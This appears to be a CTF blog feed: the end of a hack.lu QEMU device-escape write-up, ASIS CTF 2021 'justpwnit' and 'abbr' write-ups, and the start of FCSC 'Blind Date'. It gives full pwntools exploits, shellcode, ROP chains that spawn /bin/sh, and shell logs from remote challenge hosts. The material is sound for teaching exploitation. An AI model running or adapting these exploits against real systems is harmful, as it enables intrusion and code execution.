Given that we don't want to get the leak from heap because of the unreliability we can see that there are available leaks in a writable area of the binary in anon_559a89353, indeed the page address looks like a PIE based binary address or an heap address (but the address is not marked heap), and if we look more carefully, the page is contiguous to the last file mapped memory area. Now we can leak the rwx memory area, lets' find a way to leak object's address! I asked on the hack.lu discord a hint for this leak because didn't have any idea. And finally it's quite easy, we can just leak the opaque pointer in the MemoryRegion structure which points to the object's address.

If I summarize we have:

A reliable leak of:
- the object's address with the opaque pointer
- the binary base address (from the heap)
- the rwx memory area (writable memory area that belongs to the binary).

Then we can write this code:

// offset I got in gdb locally
uint64_t base = read_offt(0x10c0 + 8*3) - 0xdef90; // heap leak
uint64_t bss = base + 0xbc2000; // points to the anonnymous memory area right after the binary
uint64_t heap_base = read_offt(0x1000 + 8*3) - 0xf3bff0; // useless
uint64_t ops_struct = read_offt(-0xd0); // That's &ClouInspctState.mmio.ops
uint64_t addr_obj = read_offt(-(0xd0-8)) + 2568; // CloudInspectState.mmio.opaque
uint64_t leak_rwx = read_offt((bss + 0x6000) - addr_obj) & ~0xffff; // leak in the bss

printf("[*] ops_struct: %lx\n", ops_struct);
printf("[*] Binary base address: %lx\n", base);
printf("[*] Heap base address: %lx\n", heap_base);
printf("[*] Leak rwx: %lx\n", leak_rwx);
printf("[*] Addr obj: %lx\n", addr_obj);

/*
[*] ops_struct: 559a89173f20
[*] Binary base address: 559a88791000
[*] Heap base address: 559a8a0561d0
[*] Leak rwx: 7fc604000000
[*] Addr obj: 559a8af92f88
*/

Write the shellcode

I choose to write a shellcode to read the flag at leak_rwx + 0x5000, a known location we can easily read and print from the program. The shellcode is very simple:

mov rax, 2 ; SYS_open
push 0x67616c66 ; flag in little endian
mov rdi, rsp ; pointer flag string
mov rsi, 0 ; O_READ
mov rdx, 0x1fd ; mode ?
syscall
mov rdi, rax ; fd
xor rax, rax ; SYS_read
lea rsi, [rip] ; pointer to the rwx memory area (cause we're executing code within)
and rsi, 0xffffffffff000000 ; compute the base address
add rsi, 0x5000 ; add the right offset
mov rdx, 0x30 ; length of the flag to read
syscall
add rsp, 8; we pushed the flag str so we destroy it
ret ; return to continue the execution

To write the shellcode at leak_rwx + 0x1000, we can directly trigger a large write primitive:

#define CODE "\x48\xc7\xc0\x02\x00\x00\x00\x68\x66\x6c\x61\x67\x48\x89\xe7\x48\xc7\xc6\x00\x00\x00\x00\x48\xc7\xc2\xfd\x01\x00\x00\x0f\x05\x48\x89\xc7\x48\x31\xc0\x48\x8d\x35\x00\x00\x00\x00\x48\x81\xe6\x00\x00\x00\xff\x48\x81\xc6\x00\x50\x00\x00\x48\xc7\xc2\x30\x00\x00\x00\x0f\x05\x48\x83\xc4\x08\xc3"

memcpy(dmabuf, CODE, 130);

printf("[*] Writing the shellcode @ %lx\n", leak_rwx + 0x1000);
iowrite(CLOUDINSPECT_MMIO_OFFSET_CMD, CLOUDINSPECT_DMA_PUT_VALUE);
iowrite(CLOUDINSPECT_MMIO_OFFSET_DST, leak_rwx - addr_obj + 0x1000);
iowrite(CLOUDINSPECT_MMIO_OFFSET_CNT, 130);
iowrite(CLOUDINSPECT_MMIO_OFFSET_SRC, dmabuf_phys_addr);
iowrite(CLOUDINSPECT_MMIO_OFFSET_TRIGGER, 0x300);
/*
[*] Writing the shellcode @ 7fc604001000
*/

Craft fake MemoryRegionOps structure

To cratf a fake MemoryRegionOps, I just read the original MemoryRegionOps structure, I edited the read handler, and I wrote it back, in a writable memory area, at leak_rwx+0x2000. Given that sizeof(MemoryRegionOps) is not superior to DMA_SIZE, I can read and write in one time. Then we got:

// Craft fake MemoryRegionOps structure by reading the original one

struct MemoryRegionOps fake_ops = {0};
printf("[*] reading struct mmio.MemoryRegionOps @ %lx\n", ops_struct);

iowrite(CLOUDINSPECT_MMIO_OFFSET_CMD, CLOUDINSPECT_DMA_PUT_VALUE);
iowrite(CLOUDINSPECT_MMIO_OFFSET_SRC, -(addr_obj - ops_struct));
iowrite(CLOUDINSPECT_MMIO_OFFSET_CNT, sizeof(struct MemoryRegionOps));
iowrite(CLOUDINSPECT_MMIO_OFFSET_DST, dmabuf_phys_addr);
ioread(CLOUDINSPECT_MMIO_OFFSET_TRIGGER);

// Write it in the fake struct
memcpy(&fake_ops, dmabuf, sizeof(struct MemoryRegionOps));
fake_ops.read = (leak_rwx + 0x1000); 
// Edit the handler we want to hook to make it point to the shellcode at leak_rwx + 0x1000

printf("[*] fake_ops.read = %lx\n", leak_rwx + 0x1000);
memcpy(dmabuf, &fake_ops, sizeof(struct MemoryRegionOps));

// patch it and write it @ leak_rwx + 0x2000
iowrite(CLOUDINSPECT_MMIO_OFFSET_CMD, CLOUDINSPECT_DMA_PUT_VALUE);
iowrite(CLOUDINSPECT_MMIO_OFFSET_DST, leak_rwx - addr_obj + 0x2000);
iowrite(CLOUDINSPECT_MMIO_OFFSET_CNT, sizeof(struct MemoryRegionOps));
iowrite(CLOUDINSPECT_MMIO_OFFSET_SRC, dmabuf_phys_addr);
iowrite(CLOUDINSPECT_MMIO_OFFSET_TRIGGER, 0x300);

Hook mmio.ops + PROFIT

We just have to replace the original CoudInspect.mmio.ops pointer to a pointer to the fake_ops structure. Then, next time we send a read request, the shellcode will be executed! And we will just need to retablish the original CoudInspect.mmio.ops pointer to read the flag at leak_rwx+0x5000! Which gives:

write_dmabuf(-0xd0, leak_rwx+0x2000);
// Set the pointer to the MemoryRegionOps to the fake MemoryRegionOps	

ioread(0x37); // trigger the read handler we control, then the shellcode is 
// executed and the flag is written @ leak_rwx + 0x5000[enter link description here](cloudinspect)

printf("[*] CloudInspectState.mmio.ops.read () => jmp @ %lx\n", leak_rwx + 0x1000);

char flag[0x30] = {0};
// So we just have to read the flag @ leak_rwx + 0x5000

write_dmabuf(-0xd0, ops_struct);
printf("[*] CloudInspectState.mmio.ops = original ops\n");
printf("[*] Reading the flag @ %lx\n", leak_rwx + 0x5000);
iowrite(CLOUDINSPECT_MMIO_OFFSET_CMD, CLOUDINSPECT_DMA_PUT_VALUE);
iowrite(CLOUDINSPECT_MMIO_OFFSET_SRC, leak_rwx - addr_obj + 0x5000);
iowrite(CLOUDINSPECT_MMIO_OFFSET_CNT, 0x30);
iowrite(CLOUDINSPECT_MMIO_OFFSET_DST, dmabuf_phys_addr);
if (!ioread(CLOUDINSPECT_MMIO_OFFSET_TRIGGER)) {
		perror("Failed to read the flag\n");
		return -1;
}

memcpy(flag, dmabuf, 0x30);
printf("flag: %s\n", flag);


// adresses are different because here is another execution on the remote challenge
/*
b'[*] CloudInspectState.mmio.ops.read () => jmp @ 7fe3dc001000\r\r\n'
b'[*] CloudInspectState.mmio.ops = original ops\r\r\n'
b'[*] Reading the flag @ 7fe3dc005000\r\r\n'
b'flag: flag{cloudinspect_inspects_your_cloud_0107}\r\r\n'

flag: flag{cloudinspect_inspects_your_cloud_0107}
*/

Thanks for the organizers for this awesome event! The other pwn challenges look like very interesting as well! You can the final exploit here.

Resources

[ASIS CTF QUALS 2021 - pwn] abbr & justpwnit

Sun, 24 Oct 2021 00:00:00 GMT

Hello folks ! Here is a write up for the two first pwn challenges of the ASIS CTF. You can find the related files here.

justpwnit

justpwnit was a warmup pwn challenge. That's only a basic stack overflow. The binary is statically linked and here is the checksec's output:

[*] '/home/nasm/justpwnit'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

Morever the source code is provided as it is the case for all the pwn tasks ! Here it is:

/*
 * musl-gcc main.c -o chall -no-pie -fno-stack-protector -O0 -static
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define STR_SIZE 0x80

void set_element(char **parray) {
  int index;
  printf("Index: ");
  if (scanf("%d%*c", &index) != 1)
    exit(1);
  if (!(parray[index] = (char*)calloc(sizeof(char), STR_SIZE)))
    exit(1);
  printf("Data: ");
  if (!fgets(parray[index], STR_SIZE, stdin))
    exit(1);
}

void justpwnit() {
  char *array[4];
  for (int i = 0; i < 4; i++) {
    set_element(array);
  }
}

int main() {
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stdout, NULL, _IONBF, 0);
  alarm(180);
  justpwnit();
  return 0;
}

The program is basically reading STR_SIZE bytes into parray[index], the issue is that there is no check on the user controlled index from which we choose were write the input. Furthermore, index is a signed integer, which means we can input a negative value. If we do so we will be able to overwrite the saved $rbp value of the set_element stackframe by a heap pointer to our input. By this way at the end of the pwninit, the leave instruction will pivot the stack from the original state to a pointer to the user input.

Let's see this in gdb !

00:0000│ rsp     0x7ffef03864e0 ◂— 0x0                                                                                                                                                         
01:0008│         0x7ffef03864e8 —▸ 0x7ffef0386520 ◂— 0xb4                                                                                                                                      
02:0010│         0x7ffef03864f0 ◂— 0x0
03:0018│         0x7ffef03864f8 ◂— 0xfffffffe00403d3f /* '?=@' */
04:0020│         0x7ffef0386500 ◂— 0x0
05:0028│         0x7ffef0386508 —▸ 0x40123d (main) ◂— endbr64 
06:0030│ rbx rbp 0x7ffef0386510 —▸ 0x7ffef0386550 —▸ 0x7ffef0386560 ◂— 0x1
07:0038│         0x7ffef0386518 —▸ 0x40122f (justpwnit+33) ◂— add    dword ptr [rbp - 4], 1
08:0040│ rax     0x7ffef0386520 ◂— 0xb4
09:0048│         0x7ffef0386528 ◂— 0x0
... ↓            4 skipped
0e:0070│         0x7ffef0386550 —▸ 0x7ffef0386560 ◂— 0x1
0f:0078│         0x7ffef0386558 —▸ 0x401295 (main+88) ◂— mov    eax, 0

That's the stack's state when we are calling calloc. We can see the set_element's stackframe which ends up in $rsp+38 with the saved return address. And right after we see that $rax contains the address of the parray buffer. Which means that if we send -2 as index, $rbp will point to the newly allocated buffer to which we will write right after with fgets.

Then, if we do so, the stack's state looks like this:

00:0000│ rsp     0x7ffef03864e0 ◂— 0x0                                                                                                                                                         
01:0008│         0x7ffef03864e8 —▸ 0x7ffef0386520 ◂— 0xb4                                                                                                                                      
02:0010│         0x7ffef03864f0 ◂— 0x0                                                                                                                                                         
03:0018│         0x7ffef03864f8 ◂— 0xfffffffe00403d3f /* '?=@' */                                                                                                                              
04:0020│         0x7ffef0386500 ◂— 0x0                                                                                                                                                         
05:0028│         0x7ffef0386508 —▸ 0x40123d (main) ◂— endbr64                                                                                                                                  
06:0030│ rbx rbp 0x7ffef0386510 —▸ 0x7f2e4aea1050 ◂— 0x0                                                                                                                                       
07:0038│         0x7ffef0386518 —▸ 0x40122f (justpwnit+33) ◂— add    dword ptr [rbp - 4], 1                                                                                                    
08:0040│         0x7ffef0386520 ◂— 0xb4                                                                                                                                                        
09:0048│         0x7ffef0386528 ◂— 0x0                                                                                                                                                         
... ↓            4 skipped                                                                                                                                                                     
0e:0070│         0x7ffef0386550 —▸ 0x7ffef0386560 ◂— 0x1                                                                                                                                       
0f:0078│         0x7ffef0386558 —▸ 0x401295 (main+88) ◂— mov    eax, 0

The saved $rbp has been overwritten with a pointer to the user input. Then, at the end of the set_element function, $rbp is popped from the stack and contains a pointer to the user input. Which causes at the end of the justpwnit function, the leave instruction moves the pointer to the user input in $rsp.

ROPchain

Once we can pivot the stack to makes it point to some user controlled areas, we just have to rop through all the gadgets we can find in the binary. The binary is statically linked, and there is no system function in the binary, so we can't make a ret2system, we have to make a execve("/bin/sh\0", NULL, NULL).

And so what we need is:

pop rdi gadget
pop rsi gadget
pop rdx gadget
pop rax gadget
syscall gadget
mov qword ptr [reg], reg [to write "/bin/sh\0"] in a writable area

We can easily find these gadgets with the help ROPgadget. We got:

0x0000000000406c32 : mov qword ptr [rax], rsi ; ret
0x0000000000401001 : pop rax ; ret
0x00000000004019a3 : pop rsi ; ret
0x00000000004013e9 : syscall
0x0000000000403d23 : pop rdx ; ret
0x0000000000401b0d : pop rdi ; ret

Now we just have to craft the ropchain !

POP_RDI = 0x0000000000401b0d
POP_RDX = 0x0000000000403d23
SYSCALL = 0x00000000004013e9
POP_RAX = 0x0000000000401001
POP_RSI = 0x00000000004019a3

MOV_RSI_PTR_RAX = 0x0000000000406c32
PT_LOAD_W = 0x00000000040c240

pld = pwn.p64(0) + pwn.p64(POP_RSI) + b"/bin/sh\x00"
pld += pwn.p64(POP_RAX) + pwn.p64(PT_LOAD_W)
pld += pwn.p64(MOV_RSI_PTR_RAX)
pld += pwn.p64(POP_RAX) + pwn.p64(0x3b)
pld += pwn.p64(POP_RDI) + pwn.p64(PT_LOAD_W)
pld += pwn.p64(POP_RSI) + pwn.p64(0)
pld += pwn.p64(POP_RDX) + pwn.p64(0x0)
pld += pwn.p64(SYSCALL)

And we can enjoy the shell !

➜  justpwnit git:(master) ✗ python3 exploit.py HOST=168.119.108.148 PORT=11010
[*] '/home/nasm/pwn/asis2021/justpwnit/justpwnit'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to 168.119.108.148 on port 11010: Done
[*] Switching to interactive mode
$ id
uid=999(pwn) gid=999(pwn) groups=999(pwn)
$ ls
chall
flag-69a1f60d8055c88ea27fed1ab926b2b6.txt
$ cat flag-69a1f60d8055c88ea27fed1ab926b2b6.txt
ASIS{p01nt_RSP_2_h34p!_RHP_1n5t34d_0f_RSP?}

Full exploit

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# this exploit was generated via
# 1) pwntools
# 2) ctfinit

import os
import time
import pwn


# Set up pwntools for the correct architecture
exe  = pwn.context.binary = pwn.ELF('justpwnit')
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False

host = pwn.args.HOST
port = int(pwn.args.PORT or 1337)

def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if pwn.args.GDB:
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return pwn.process([exe.path] + argv, *a, **kw)

def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if pwn.args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)
gdbscript = '''
source /media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/Downloads/pwndbg/gdbinit.py
set follow-fork-mode parent
b* main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================

io = start()
io.sendlineafter(b"Index: ", b"-2")

# 0x0000000000406c32 : mov qword ptr [rax], rsi ; ret
# 0x0000000000401001 : pop rax ; ret
# 0x00000000004019a3 : pop rsi ; ret
# 0x00000000004013e9 : syscall
# 0x0000000000403d23 : pop rdx ; ret
# 0x0000000000401b0d : pop rdi ; ret

POP_RDI = 0x0000000000401b0d
POP_RDX = 0x0000000000403d23
SYSCALL = 0x00000000004013e9
POP_RAX = 0x0000000000401001
POP_RSI = 0x00000000004019a3

MOV_RSI_PTR_RAX = 0x0000000000406c32

PT_LOAD_W = 0x00000000040c240

pld = pwn.p64(0) + pwn.p64(POP_RSI) + b"/bin/sh\x00"
pld += pwn.p64(POP_RAX) + pwn.p64(PT_LOAD_W)
pld += pwn.p64(MOV_RSI_PTR_RAX)
pld += pwn.p64(POP_RAX) + pwn.p64(0x3b)
pld += pwn.p64(POP_RDI) + pwn.p64(PT_LOAD_W)
pld += pwn.p64(POP_RSI) + pwn.p64(0)
pld += pwn.p64(POP_RDX) + pwn.p64(0x0)
pld += pwn.p64(SYSCALL)

io.sendlineafter(b"Data: ", pld)

io.interactive()

abbr

abbr is very basic heap overflow, we just have to overwrite a function pointer to a stack pivot gadget with the help of a user controlled register. Then, we can drop a shell with a similar ROP as for the justpwnit challenge (the binary is also statically linked without the system function).

Here is the source code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <ctype.h>
#include "rules.h"

typedef struct Translator {
  void (*translate)(char*);
  char *text;
  int size;
} Translator;

void english_expand(char *text) {
  int i, alen, blen;
  Rule *r;
  char *p, *q;
  char *end = &text[strlen(text)-1]; // pointer to the last character

  /* Replace all abbreviations */
  for (p = text; *p; ++p) {
    for (i = 0; i < sizeof(rules) / sizeof(Rule); i++) {
      r = &rules[i];
      alen = strlen(r->a);
      blen = strlen(r->b);
      if (strncasecmp(p, r->a, alen) == 0) {
        // i.e "i'm pwn noob." --> "i'm pwn XXnoob."
        for (q = end; q > p; --q)
          *(q+blen-alen) = *q;
        // Update end
        end += blen-alen;
        *(end+1) = '\0';
        // i.e "i'm pwn XXnoob." --> "i'm pwn newbie."
        memcpy(p, r->b, blen);
      }
    }
  }
}

Translator *translator_new(int size) {
  Translator *t;

  /* Allocate region for text */
  char *text = (char*)calloc(sizeof(char), size);
  if (text == NULL)
    return NULL;

  /* Initialize translator */
  t = (Translator*)malloc(sizeof(Translator));
  t->text = text;
  t->size = size;
  t->translate = english_expand;

  return t;
}

void translator_reset(Translator *t) {
  memset(t->text, 0, t->size);
}

int main() {
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stdout, NULL, _IONBF, 0);
  alarm(60);

  Translator *t = translator_new(0x1000);
  while (1) {
    /* Input data */
    translator_reset(t);
    printf("Enter text: ");
    fgets(t->text, t->size, stdin);
    if (t->text[0] == '\n')
      break;

    /* Expand abbreviation */
    t->translate(t->text);
    printf("Result: %s", t->text);
  }

  return 0;
}

The rules.h looks like this:

typedef struct {
  char *a; // abbreviated string (i.e "asap")
  char *b; // expanded string (i.e "as soon as possible")
} Rule;

// Why are there so many abbreviations in English!!?? :exploding_head:
Rule rules[] =
  {
   {.a="2f4u", .b="too fast for you"},
   {.a="4yeo", .b="for your eyes only"},
   {.a="fyeo", .b="for your eyes only"},
   {.a="aamof", .b="as a matter of fact"},
   {.a="afaik", .b="as far as i know"},
   {.a="afk", .b="away from keyboard"},
   {.a="aka", .b="also known as"},
   {.a="b2k", .b="back to keyboard"},
   {.a="btk", .b="back to keyboard"},
   {.a="btt", .b="back to topic"},
   {.a="btw", .b="by the way"},
   {.a="b/c", .b="because"},
   {.a="c&p", .b="copy and paste"},
   {.a="cys", .b="check your settings"},
   {.a="diy", .b="do it yourself"},
   {.a="eobd", .b="end of business day"},
   {.a="faq", .b="frequently asked questions"},
   {.a="fka", .b="formerly known as"},
   {.a="fwiw", .b="for what it's worth"},
   {.a="fyi", .b="for your information"},
   {.a="jfyi", .b="just for your information"},
   {.a="hf", .b="have fun"},
   {.a="hth", .b="hope this helps"},
   {.a="idk", .b="i don't know"},
   {.a="iirc", .b="if i remember correctly"},
   {.a="imho", .b="in my humble opinion"},
   {.a="imo", .b="in my opinion"},
   {.a="imnsho", .b="in my not so humble opinion"},
   {.a="iow", .b="in other words"},
   {.a="itt", .b="in this thread"},
   {.a="dgmw", .b="don't get me wrong"},
   {.a="mmw", .b="mark my words"},
   {.a="nntr", .b="no need to reply"},
   {.a="noob", .b="newbie"},
   {.a="noyb", .b="none of your business"},
   {.a="nrn", .b="no reply necessary"},
   {.a="otoh", .b="on the other hand"},
   {.a="rtfm", .b="read the fine manual"},
   {.a="scnr", .b="sorry, could not resist"},
   {.a="sflr", .b="sorry for late reply"},
   {.a="tba", .b="to be announced"},
   {.a="tbc", .b="to be continued"},
   {.a="tia", .b="thanks in advance"},
   {.a="tq", .b="thank you"},
   {.a="tyvm", .b="thank you very much"},
   {.a="tyt", .b="take your time"},
   {.a="ttyl", .b="talk to you later"},
   {.a="wfm", .b="works for me"},
   {.a="wtf", .b="what the fuck"},
   {.a="wrt", .b="with regard to"},
   {.a="ymmd", .b="you made my day"},
   {.a="icymi", .b="in case you missed it"},
   // pwners abbreviations
   {.a="rop ", .b="return oriented programming "},
   {.a="jop ", .b="jump oriented programming "},
   {.a="cop ", .b="call oriented programming "},
   {.a="aar", .b="arbitrary address read"},
   {.a="aaw", .b="arbitrary address write"},
   {.a="www", .b="write what where"},
   {.a="oob", .b="out of bounds"},
   {.a="ret2", .b="return to "},
  };

The main stuff is in english_expand function which is looking for an abreviation in the user input. If it finds the abbreviation, all the data after the occurence will be written further according to the length of the full expression. The attack idea is fairly simple, the text variable is allocated right before the Translator structure, and so in the heap they will be contiguous. Given that, we know that if we send 0x1000 bytes in the chunk contained by text and that we put an abbreviation of the right length we can overwrite the translate function pointer.

I will not describe in details how we can find the right size for the abbreviation or the length off the necessary padding. An interesting abbreviation is the www, which stands for "write what where" (what a nice abbreviation for a pwner lmao), indeed the expanded expression has a length of 16 bytes. So we send b"wwwwww" + b"A"*(0x1000-16) + pwn.p64(gadget), we will overflow the 32 first bytes next the text chunk, and in this rewrite the translator function pointer.

ROPchain

Once that's done, when the function pointer will be triggered at the next iteration, we will be able to jmp at an arbitrary location. Lets take a look at the values of the registers when we trigger the function pointer:

 RAX  0x1ee8bc0 —▸ 0x4018da (init_cacheinfo+234) ◂— pop    rdi
 RBX  0x400530 (_IO_getdelim.cold+29) ◂— 0x0
 RCX  0x459e62 (read+18) ◂— cmp    rax, -0x1000 /* 'H=' */
*RDX  0x405121 (_nl_load_domain+737) ◂— xchg   eax, esp
 RDI  0x1ee8bc0 —▸ 0x4018da (init_cacheinfo+234) ◂— pop    rdi
 RSI  0x4c9943 (_IO_2_1_stdin_+131) ◂— 0x4cc020000000000a /* '\n' */
 R8   0x1ee8bc0 —▸ 0x4018da (init_cacheinfo+234) ◂— pop    rdi
 R9   0x0
 R10  0x49e522 ◂— 'Enter text: '
 R11  0x246
 R12  0x4030e0 (__libc_csu_fini) ◂— endbr64 
 R13  0x0
 R14  0x4c9018 (_GLOBAL_OFFSET_TABLE_+24) —▸ 0x44fd90 (__strcpy_avx2) ◂— endbr64 
 R15  0x0
 RBP  0x7ffdef1b8230 —▸ 0x403040 (__libc_csu_init) ◂— endbr64 
 RSP  0x7ffdef1b8220 ◂— 0x0
 RIP  0x402036 (main+190) ◂— call   rdx

$rax points to the newly readen input, same for $r8 and $rdi and $rdx contains the location to which we will jmp on. So we can search gadgets like mov rsp, rax, mov rsp, rdi, mov rsp, r8 and so on. But I didn't find any gadgets like that, so I looked for xchg rsp gadgets, and I finally found a xchg eax, esp gadgets ! Since the binary is not PIE based, the heap addresses fit into a 32 bits register, so that's perfect!

Now we can make $rsp to point to the user input, we make a similar ropchain as the last challenge, and that's enough to get a shell!


# 0x00000000004126e3 : call qword ptr [rax]
# 0x0000000000485fd2 : xchg eax, ebp ; ret
# 0x0000000000405121 : xchg eax, esp ; ret

pld = b"wwwwww"
pld += b"A"*(0x1000-16) + pwn.p64(0x0000000000405121)
io.sendlineafter("Enter text: ", pld)

# 0x000000000045a8f7 : pop rax ; ret
# 0x0000000000404cfe : pop rsi ; ret
# 0x00000000004018da : pop rdi ; ret
# 0x00000000004017df : pop rdx ; ret
# 0x000000000045684f : mov qword ptr [rdi], rsi ; ret

DATA_SEC = 0x0000000004c90e0
POP_RDI = 0x00000000004018da
POP_RSI = 0x0000000000404cfe
POP_RAX = 0x000000000045a8f7
POP_RDX = 0x00000000004017df
MOV_PTR_RDI_RSI = 0x000000000045684f
SYSCALL = 0x00000000004012e3 # syscall

pld = pwn.p64(POP_RDI)
pld += pwn.p64(DATA_SEC)
pld += pwn.p64(POP_RSI)
pld += b"/bin/sh\x00"
pld += pwn.p64(MOV_PTR_RDI_RSI)
pld += pwn.p64(POP_RSI)
pld += pwn.p64(0x0)
pld += pwn.p64(POP_RDX)
pld += pwn.p64(0x0)
pld += pwn.p64(POP_RAX)
pld += pwn.p64(0x3b)
pld += pwn.p64(SYSCALL)

We launch the script with the right arguments and we correctly pop a shell!

➜  abbr.d git:(master) ✗ python3 exploit.py HOST=168.119.108.148 PORT=10010 
[*] '/home/nasm/pwn/asis2021/abbr.d/abbr'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to 168.119.108.148 on port 10010: Done
/home/nasm/.local/lib/python3.8/site-packages/pwnlib/tubes/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[*] Switching to interactive mode
$ id
uid=999(pwn) gid=999(pwn) groups=999(pwn)
$ ls
chall
flag-5db495dbd5a2ad0c090b1cc11e7ee255.txt
$ cat flag-5db495dbd5a2ad0c090b1cc11e7ee255.txt
ASIS{d1d_u_kn0w_ASIS_1s_n0t_4n_4bbr3v14t10n}

Final exploit

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# this exploit was generated via
# 1) pwntools
# 2) ctfinit

import os
import time
import pwn


# Set up pwntools for the correct architecture
exe  = pwn.context.binary = pwn.ELF('abbr')
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False

host = pwn.args.HOST or '127.0.0.1'
port = int(pwn.args.PORT or 1337)

def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if pwn.args.GDB:
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return pwn.process([exe.path] + argv, *a, **kw)

def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if pwn.args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)

gdbscript = '''
source /media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/Downloads/pwndbg/gdbinit.py
b* 0x402036
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================

io = start()

# 000000000048ac90    80 FUNC    GLOBAL DEFAULT    7 _dl_make_stack_executable
# 0x0000000000422930 : add rsp, 0x10 ; pop rbp ; ret

# 0x00000000004126e3 : call qword ptr [rax]
# 0x0000000000485fd2 : xchg eax, ebp ; ret
# 0x0000000000405121 : xchg eax, esp ; ret

pld = b"wwwwww"
pld += b"A"*(0x1000-16) + pwn.p64(0x0000000000405121)
io.sendlineafter("Enter text: ", pld)

# 0x000000000045a8f7 : pop rax ; ret
# 0x0000000000404cfe : pop rsi ; ret
# 0x00000000004018da : pop rdi ; ret
# 0x00000000004017df : pop rdx ; ret
# 0x000000000045684f : mov qword ptr [rdi], rsi ; ret

DATA_SEC = 0x0000000004c90e0
POP_RDI = 0x00000000004018da
POP_RSI = 0x0000000000404cfe
POP_RAX = 0x000000000045a8f7
POP_RDX = 0x00000000004017df
MOV_PTR_RDI_RSI = 0x000000000045684f
SYSCALL = 0x00000000004012e3 # syscall

pld = pwn.p64(POP_RDI)
pld += pwn.p64(DATA_SEC)
pld += pwn.p64(POP_RSI)
pld += b"/bin/sh\x00"
pld += pwn.p64(MOV_PTR_RDI_RSI)
pld += pwn.p64(POP_RSI)
pld += pwn.p64(0x0)
pld += pwn.p64(POP_RDX)
pld += pwn.p64(0x0)
pld += pwn.p64(POP_RAX)
pld += pwn.p64(0x3b)
pld += pwn.p64(SYSCALL)

io.sendlineafter("Enter text: ", pld)
io.interactive()

[FCSC 2021 - pwn] Blind Date

Mon, 03 May 2021 00:00:00 GMT

Blind Date (489 pts)

Une société souhaite créer un service en ligne protégeant les informations de ses clients. Pouvez-vous leur montrer qu'elle n'est pas sûre en lisant le fichier flag.txt sur leur serveur ? Les gérants de cette société n'ont pas souhaité vous donner ni le code source de leur solution, ni le binaire compilé, mais ils vous proposent uniquement un accès distant à leur service.

nc challenges2.france-cybersecurity-challenge.fr 4008

Blind Date is a blind rop challenge I did during the FCSC event. So, no source code is provided, we juste have a netcat to which we can interact.

To solve this challenge I juste read carefully this paper and applied one per one the techniques described.

Find the right offset

The first thing to do is to find from which offset the binary crashes, to do so I developped a small script:

#!/usr/bin/python3
from pwn import *

def start():
    return remote("challenges2.france-cybersecurity-challenge.fr", 4008)

def jmp(av):
    io = start()
    io.write(av)
    return io.recvall(timeout=5.0)

def find_padding(p=b""):
    padding = p + b"\x90"
    print(f"[*] sending: {padding}")
    resp = jmp(padding)
    print(f"[*] recv: {resp}")
    while b"Hello you.\nWhat is your name ?\n>>> Thanks " + padding in resp:
        return find_padding(p=padding)
    return padding[:len(padding)-1] # minus one char because we do not want that padding overwrite the return address / canary / triggering a crash

print(len(find_padding()))

It's basically sending checking if the right string is always received, and when it's not the case it assumes the remote program crashed and return the corresponding padding. We do not check to see if it prints Bye! right after the Thanks input because it sounds to be a puts which prints NULL byte terminated strings which makes that we can overlap some local pointers and print them like below:

$ ./solve.py
[*] sending: b'\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90Bye!\n'
[*] sending: b'\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90Bye!\n'
[*] sending: b'\x90\x90\x90\x90\x90\x90\x90\x90'
[*] recv: b'Hello you.\nWhat is your name ?\n>>> Thanks \x90\x90\x90\x90\x90\x90\x90\x907:EL\xd3\x7fBye!\n'
